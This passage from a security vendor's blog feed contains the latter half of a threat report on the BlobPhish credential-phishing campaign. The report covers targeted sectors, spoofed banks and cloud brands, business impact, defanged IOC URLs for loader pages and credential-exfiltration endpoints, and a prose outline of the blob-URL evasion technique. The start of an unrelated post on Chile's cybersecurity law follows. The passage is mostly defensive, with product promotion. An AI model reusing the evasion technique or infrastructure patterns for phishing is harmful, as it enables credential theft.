<li>Shortened links (e.g., via t.co) redirecting through JS to the&nbsp;blob:http&nbsp;payload;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Links to legitimate-looking&nbsp;document-sharing&nbsp;services such as&nbsp;DocSend.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Threat Landscape&nbsp;</h2>



<p>First spotted in October 2024,&nbsp;BlobPhis&nbsp;has proved itself as a sustained, continuously evolving campaign that&nbsp;remains&nbsp;active at the time of publication.&nbsp;</p>



<p>Analysis of related artefacts shows that the&nbsp;threat&nbsp;actors regularly rotate infrastructure, exfiltration endpoints, loader hosting domains, and phishing lure themes. They also vary the path names of the loader pages (blob.html, blom.html, bloji.html, emailandpasssss.html) and exfiltration scripts (res.php,&nbsp;tele.php), complicating static signature-based detection.&nbsp;</p>



<h3 class="wp-block-heading">Targeted Industries&nbsp;</h3>



<p>Although the phishing lures&nbsp;predominantly impersonate&nbsp;financial and cloud services, the victim organizations span multiple sectors:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktofinance" target="_blank" rel="noreferrer noopener">Finance</a>,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Manufacturing,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Education,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Government,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Transport,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Telecommunications.&nbsp;&nbsp;</li>
</ul>



<p>Regardless of the&nbsp;victim’s&nbsp;industry, attackers focus on harvesting credentials for high-value financial and cloud corporate services — increasing the probability of capturing credentials that unlock significant monetary or data assets.&nbsp;</p>



<p><strong>Financial institutions and cloud-productivity platforms most&nbsp;frequently&nbsp;spoofed:</strong>&nbsp;</p>



<ul class="wp-block-list">
<li>Capital One,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>American Express,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>JPMorgan Chase,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Intuit,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Charles Schwab,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Morgan Stanley’s&nbsp;E*TRADE,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Merrill Lynch,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>PayPal,&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Microsoft 365 / OneDrive / SharePoint (used as a document-access lure).&nbsp;&nbsp;</li>
</ul>



<h3 class="wp-block-heading">Geography&nbsp;</h3>



<p>Approximately one-third of observed activity involves US-based users and&nbsp;organisations.&nbsp;BlobPhish&nbsp; activity has been&nbsp;observed&nbsp;from: Germany, Poland, Spain, Switzerland, United Kingdom, Australia, South Korea, Saudi Arabia, Qatar, Jordan, India, and Pakistan.&nbsp;</p>



<h2 class="wp-block-heading">Business Impact: Why&nbsp;BlobPhish&nbsp;Is a Board-Level Risk&nbsp;</h2>



<p>BlobPhish&nbsp;does not just steal one employee’s password. By targeting the financial, cloud, and productivity accounts that employees use every day, a single successful compromise can&nbsp;cascade into:&nbsp;</p>



<ul class="wp-block-list">
<li>Unauthorized wire transfers or fraudulent invoices (Business Email Compromise follow-on);&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Full Microsoft 365 tenant takeover — email, SharePoint, Teams, and connected SaaS&nbsp;apps;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/cybersecurity-blog/chile-cybersecurity-framework-law/" target="_blank" rel="noreferrer noopener">Regulatory</a>&nbsp;exposure (GDPR, SEC, FFIEC, PCI-DSS) from confirmed data&nbsp;exfiltration;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Reputational damage when customer or partner data is&nbsp;compromised;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Operational disruption if attacker&nbsp;pivots to&nbsp;ransomware after credential harvest.&nbsp;</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
High-stakes credentials deserve enterprise-grade intelligence.<br><span class="highlight">Reduce risk, not just response time.</span>   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=evasive-blob-phishing-detection&#038;utm_term=160426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact ANY.RUN
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>Security and risk teams should model the following impact chains when a&nbsp;BlobPhish&nbsp;credential is compromised:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Microsoft 365 credential</strong> → MFA fatigue or session token theft → full mailbox access → BEC fraud or data exfiltration to partners/clients; </li>
</ul>



<ul class="wp-block-list">
<li><strong>Banking credential</strong> (Chase, CapitalOne) → account takeover → wire fraud or ACH manipulation; </li>
</ul>



<ul class="wp-block-list">
<li><strong>Investment platform credential </strong>(Schwab, E*TRADE, Merrill) → unauthorized trades or fund transfer; </li>
</ul>



<ul class="wp-block-list">
<li><strong>Any cloud credential </strong>→ lateral movement to connected SaaS → ransomware deployment. </li>
</ul>



<p>Regulatory consequences may include mandatory&nbsp;breach&nbsp;notification under GDPR (72-hour window), SEC cybersecurity incident disclosure requirements, and FFIEC guidance on authentication for financial institutions.&nbsp;</p>



<h2 class="wp-block-heading">How ANY.RUN Helps You Stay Ahead&nbsp;</h2>



<p>ANY.RUN provides the complementary capabilities that address BlobPhish at every stage of the threat lifecycle: from proactive hunting to real-time detection and automated feed enrichment. </p>



<h3 class="wp-block-heading">1. Analyze Alerts &amp; Artifacts to Prevent Attack </h3>



<p>When a suspicious link or email is&nbsp;forwarded&nbsp;to the security team, ANY.RUN’s fully&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">interactive cloud sandbox</a>&nbsp;executes the entire&nbsp;BlobPhish&nbsp;kill chain in a safe cloud environment:&nbsp;</p>



<ul class="wp-block-list">
<li>The JavaScript loader runs, the Base64 payload is decoded, and the blob: URL is created,&nbsp;exactly as it would on a&nbsp;victim’s&nbsp;machine.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Analysts watch the live session and see the fake login page&nbsp;render,&nbsp;observe&nbsp;the POST to */res.php, and capture all network artefacts.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Because execution happens in a real browser, there are no emulation gaps that the&nbsp;attacker’s&nbsp;anti-sandbox checks could exploit.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Full&nbsp;analysis&nbsp;reports — including screenshots, network traffic, memory artefacts, and extracted IOCs — are generated in minutes.&nbsp;</li>
</ul>



<p>This means your SOC can definitively confirm or dismiss a&nbsp;BlobPhish&nbsp;suspicion within minutes rather than hours, without risking any internal system.&nbsp;</p>



<h3 class="wp-block-heading">2.&nbsp;Stop Future Attacks by Enriching Proactive Defense&nbsp;</h3>



<p><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>&nbsp;gives threat hunters direct, query-based access to the ANY.RUN database of analyzed samples and infrastructure:&nbsp;</p>



<ul class="wp-block-list">
<li>Run YARA-based searches to find all samples matching the&nbsp;BlobPhishLoaderHTML&nbsp;rule.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Pivot on URL patterns (url:&#8221;/res.php$&#8221;,&nbsp;url:&#8221;*/blob.html$&#8221;) to discover new attacker infrastructure the moment it appears in the wild.&nbsp;</li>
</ul>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktolookup/#%7B%2522query%2522:%2522url:%255C%2522*/res.php$%255C%2522%2520AND%2520url:%255C%2522*/blob.html$%255C%2522%2520and%2520threatName:%255C%2522phishing%255C%2522%2522,%2522dateRange%2522:180%7D" target="_blank" rel="noreferrer noopener">url:&#8221;*/res.php$&#8221; AND url:&#8221;*/blob.html$&#8221; and threatName:&#8221;phishing&#8221;</a> </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="556" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19-1024x556.png" alt="" class="wp-image-20161" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19-1024x556.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19-300x163.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19-768x417.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19-1536x834.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19-370x201.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19-270x147.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19-740x402.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/blob_19.png 1562w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>BlobPhish sandbox detonations found via TI Lookup</em> </figcaption></figure>



<ul class="wp-block-list">
<li>Correlate domains, IPs, file hashes, and HTTP patterns across millions of analyzed tasks.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Export results directly into SIEM, SOAR, or ticketing workflows.&nbsp;</li>
</ul>



<p>Security teams can&nbsp;monitor&nbsp;this campaign continuously rather than reacting after a compromise. New loader domains and exfiltration endpoints are surfaced as soon as ANY.RUN community members (and automated systems)&nbsp;submit&nbsp;related tasks.&nbsp;</p>



<h3 class="wp-block-heading">3. Automate Monitoring with Live Intelligence </h3>



<p><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence&nbsp;Feeds</a>&nbsp;deliver structured, machine-readable threat intelligence in STIX/TAXII or flat-file formats, enabling automated enforcement across your security stack:&nbsp;</p>



<ul class="wp-block-list">
<li>BlobPhish-related domains, IPs, and URL patterns are automatically pushed to firewalls, proxies, and SIEM correlation rules.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Indicators are enriched with context (campaign name, targeted brand, exfiltration pattern, confidence level) so that alerts are actionable, not just noisy.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Feeds are updated in near-real-time as the campaign evolves, meaning your defenses track the attacker’s infrastructure rotation without manual analyst effort.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Integration is supported with leading SIEM/SOAR platforms (Splunk, Microsoft Sentinel, Palo Alto XSOAR, and others) via standard connectors.&nbsp;</li>
</ul>



<p>Rather than relying solely on reactive detection, TI Feeds shift your posture to proactive blocking:&nbsp;exfiltration endpoints are denied before a single employee credential can be harvested.&nbsp;</p>



<h2 class="wp-block-heading">Indicators of Compromise (IOCs)&nbsp;</h2>



<p><strong>URLs </strong></p>



<ul class="wp-block-list">
<li>hxxps[://]mtl-logistics[.]com/blb/blob[.]html&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]mtl-logistics[.]com/css/sharethepoint/point/res[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]larva888[.]com/wp-includes/css/dist/tmp/vmo[.]html&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]wajah4dslot[.]com/wp-includes/certificates/tmp//res[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]wajah4dslot[.]com/wp-includes/certificates/tmp//panel[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]mail[.]hubnorte[.]com[.]br/blom[.]html&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]riobeautybrazil[.]com/wp-admin/amx/res[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]riobeautybrazil[.]com/wp-admin/amx/panel[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]hnint[.]net/bloji[.]html&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]hnint[.]net/cgi-bin/peacemind//res[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]hnint[.]net/cgi-bin/peacemind//panel[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/blob[.]html&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/trade//res[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/trade//panel[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]i-seotools[.]com/wp-content/citttboy[.]html&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]mts-egy[.]net/wp-content/plugins/owpsyzj/cgi-ent/res[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]mts-egy[.]net/wp-content/plugins/owpsyzj/cgi-ent/panel[.]php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]localmarketsense[.]com/wp-includes/Text/sxzmqkp/krtxbvo/sahz1xi/cgi-ent/emailandpasssss[.]html&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hxxps[://]_wildcard_[.]gonzalezlawnandlandscaping[.]com/zovakmf/exfuzaj/pcnlwyf/cgi-ent/tele[.]php&nbsp;</li>
</ul>



<p><strong>Domains </strong></p>



<ul class="wp-block-list">
<li>mtl-logistics[.]com&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>larva888[.]com&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>wajah4dslot[.]com&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>mail[.]hubnorte[.]com[.]br&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>riobeautybrazil[.]com&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>hnint[.]net&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>ftpbd[.]net&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>i-seotools[.]com&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>mts-egy[.]net&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p>BlobPhish&nbsp;represents&nbsp;a mature, well-maintained phishing operation that has been running continuously for over eighteen months. Its core innovation — abusing the browser’s Blob URL API to serve phishing pages entirely in memory —&nbsp;renders&nbsp;the campaign invisible to a wide range of conventional controls including secure email gateways, URL filters, web proxies, and file-based endpoint solutions.&nbsp;</p>



<p>For security teams, the takeaway is clear: static and perimeter-based defenses are insufficient against this class of attack. Effective defense requires dynamic analysis (to execute and observe the full attack chain), proactive threat hunting (to discover attacker infrastructure before it is weaponized against your organization), and automated, continuously updated threat intelligence feeds that propagate IOCs across the entire security stack in near-real-time.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Provide your team with the <span class="highlight">visibility and speed</span><br>to stay ahead of BlobPhish and protect business assets.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=evasive-blob-phishing-detection&#038;utm_term=160426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact ANY.RUN
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN&nbsp;&nbsp;&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.&nbsp;&nbsp;&nbsp;</p>



<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, enrich&nbsp;indicators&nbsp;with immediate context through&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and&nbsp;monitor&nbsp;emerging malicious infrastructure using&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the&nbsp;SOC.&nbsp;&nbsp;&nbsp;</p>



<p>ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=evasive-blob-phishing-detection&amp;utm_term=160426&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified</a>,&nbsp;demonstrating&nbsp;its commitment to protecting customer data and&nbsp;maintaining&nbsp;strong security controls.&nbsp;</p>



<h2 class="wp-block-heading">FAQ</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1776336744542"><strong class="schema-faq-question">What is BlobPhish?</strong> <p class="schema-faq-answer">BlobPhish is an ongoing credential-phishing campaign active since October 2024 that delivers fake login pages as browser blob objects, evading traditional security tools.</p> </div> <div class="schema-faq-section" id="faq-question-1776336780562"><strong class="schema-faq-question">How does the blob technique work?</strong> <p class="schema-faq-answer">JavaScript decodes a base64 payload, creates a blob object, generates a blob:https:// URL, forces the browser to load it via a hidden link, then immediately cleans up — leaving no file or cache trace.</p> </div> <div class="schema-faq-section" id="faq-question-1776336790058"><strong class="schema-faq-question">Which companies and services are impersonated?</strong> <p class="schema-faq-answer">Microsoft 365, Chase, Capital One, FDIC, E*TRADE, Charles Schwab, American Express, PayPal, and others — primarily U.S. financial and cloud brands.</p> </div> <div class="schema-faq-section" id="faq-question-1776336799842"><strong class="schema-faq-question">What are the main indicators of compromise?</strong> <p class="schema-faq-answer">URLs ending in /blob.html, /res.php, /tele.php or /panel.php; the YARA rule provided; and blob:https:// URLs in browser history.</p> </div> <div class="schema-faq-section" id="faq-question-1776336814449"><strong class="schema-faq-question">Who is at risk?</strong> <p class="schema-faq-answer">Organizations in Finance, Manufacturing, Education, Government, Transport, and Telecommunications — especially those using Microsoft 365 or corporate online banking.</p> </div> <div class="schema-faq-section" id="faq-question-1776336830777"><strong class="schema-faq-question">How can executives reduce the business impact?</strong> <p class="schema-faq-answer">Enforce MFA, train staff on unexpected login prompts, and integrate proactive threat intelligence that catches memory-resident attacks before they reach employees.</p> </div> <div class="schema-faq-section" id="faq-question-1776336848361"><strong class="schema-faq-question">How does ANY.RUN specifically help against BlobPhish?</strong> <p class="schema-faq-answer">The interactive Sandbox detonates the attack in a real browser to reveal blob behavior; TI Lookup surfaces related samples instantly; and TI Feeds push live IOCs into your security tools for automated prevention.</p> </div> </div>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/evasive-blob-phishing-detection/">BlobPhish: The Phantom Phishing Campaign Hiding in Browser Memory</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/evasive-blob-phishing-detection/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Chile’s Cybersecurity Framework Law: How SOCs Achieve Compliance and Response Readiness</title>
		<link>https://any.run/cybersecurity-blog/chile-cybersecurity-framework-law/</link>
					<comments>https://any.run/cybersecurity-blog/chile-cybersecurity-framework-law/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 15 Apr 2026 11:18:05 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20034</guid>

					<description><![CDATA[<p>In Chile, cybersecurity compliance is becoming an operational issue, not just a legal one. Under the new Cybersecurity Framework Law, organizations must show they have real capabilities for threat detection, incident analysis, and response. For many teams, that exposes a serious gap between regulatory expectations and day-to-day security operations.&#160; Key Takeaways&#160; The Regulatory&#160;Shift&#160; Chile has [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/chile-cybersecurity-framework-law/">Chile’s Cybersecurity Framework Law: How SOCs Achieve Compliance and Response Readiness</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>In Chile, cybersecurity compliance is becoming an operational issue, not just a legal one. Under the new Cybersecurity Framework Law, organizations must show they have real capabilities for threat detection, incident analysis, and response. For many teams, that exposes a serious gap between regulatory expectations and day-to-day security operations.&nbsp;</p>



<h2 class="wp-block-heading">Key Takeaways&nbsp;</h2>



<ul class="wp-block-list">
<li><strong>Chile’s Cybersecurity Framework Law raises the pressure on operational readiness:</strong>&nbsp;Security leaders need teams that can detect threats, investigate incidents, and support response decisions without delay.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Slow investigation can quickly become a business risk:</strong>&nbsp;Delayed response weakens evidence, increases regulatory pressure, and makes post-incident review harder to manage.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Faster triage and clearer evidence now matter more:</strong>&nbsp;Better visibility into suspicious activity helps reduce disruption, improve reporting quality, and support faster decisions under tight deadlines.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>For business leaders, this is about continuity as much as compliance:</strong>&nbsp;Teams must be able to&nbsp;contain&nbsp;incidents, document actions, and&nbsp;maintain&nbsp;control during regulatory scrutiny.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>ANY.RUN’s&nbsp;</strong><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktoenterpriselanding" target="_blank" rel="noreferrer noopener"><strong>Enterprise solutions</strong></a><strong>&nbsp;help&nbsp;reduce operational risk under compliance pressure:</strong>&nbsp;They support faster investigations, stronger evidence, and more controlled analysis workflows.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">The Regulatory&nbsp;Shift&nbsp;</h2>



<p>Chile has taken a decisive step toward strengthening its national cybersecurity posture with the approval of&nbsp;<strong>Law No. 21.663</strong>&nbsp;– the Cybersecurity Framework Law. This legislation&nbsp;establishes&nbsp;mandatory cybersecurity obligations for organizations classified as:&nbsp;</p>



<ul class="wp-block-list">
<li>Operators of Vital Importance (OIV)&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Operators of Essential Services&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Critical public sector entities&nbsp;</li>
</ul>



<p>Unlike traditional compliance frameworks that focus on policies and documentation, Chile&#8217;s approach is outcome-driven and risk-based. Organizations must demonstrate <strong>real operational capabilities</strong>– not just checkbox compliance. With enforcement and audits ramping up through 2025-2026, the compliance window is closing fast.</p>



<p>The scope is broad. An estimated <strong>915 organizations</strong>&nbsp;across energy, telecommunications, banking and <a href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktofinancelanding" target="_blank" rel="noreferrer noopener">financial services</a>, digital infrastructure, <a href="https://any.run/by-industry/healthcare/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rsac-2026&amp;utm_term=300326&amp;utm_content=linktohealthcarelanding" target="_blank" rel="noreferrer noopener">healthcare</a>, and public institutions must now prove their cybersecurity readiness.</p>



<h2 class="wp-block-heading">What the New Law Requires from Security Teams&nbsp;</h2>



<p>Chile’s Cybersecurity Framework Law does not mandate specific tools, but it does set clear expectations for operational readiness. Regulated organizations are expected to have the following:&nbsp;</p>



<p><img src="https://s.w.org/images/core/emoji/15.0.3/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" />&nbsp;<strong>Effective threat detection:</strong>&nbsp;Identify malicious activity before it causes damage&nbsp;<br><img src="https://s.w.org/images/core/emoji/15.0.3/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /><strong> Timely incident analysis and response:</strong>&nbsp;Understand what happened, how, and what to do&nbsp;<br><img src="https://s.w.org/images/core/emoji/15.0.3/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Continuous risk management:&nbsp;</strong>Adapt&nbsp;defenses&nbsp;as the threat landscape evolves&nbsp;<br><img src="https://s.w.org/images/core/emoji/15.0.3/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Evidence-based reporting:&nbsp;</strong>Provide detailed, defensible reports to Chile&#8217;s national CSIRT and regulatory authorities&nbsp;</p>



<p>Regulated entities must permanently apply technical and organizational measures to prevent, report, and resolve cybersecurity incidents in line with ANCI protocols and sector-specific standards. They must also report significant cyberattacks and incidents to the national CSIRT under a defined timeline.&nbsp;</p>



<p>For operators of vital importance, requirements are stricter. They must run a continuous information security management system, document security actions, and maintain certified cybersecurity and continuity plans, reviewed at least every two years.</p>



<p>They are also expected to conduct regular exercises, implement rapid containment measures, train staff, and appoint an independent cybersecurity delegate with direct access to top management and formal responsibility for coordination with ANCI.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight"> Build a compliant and mature SOC </span><br>Integrate ANY.RUN&#8217;s solutions to reduce business risk and boost security&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=chile-cybersecurity-framework-law&#038;utm_term=150426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Power up your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



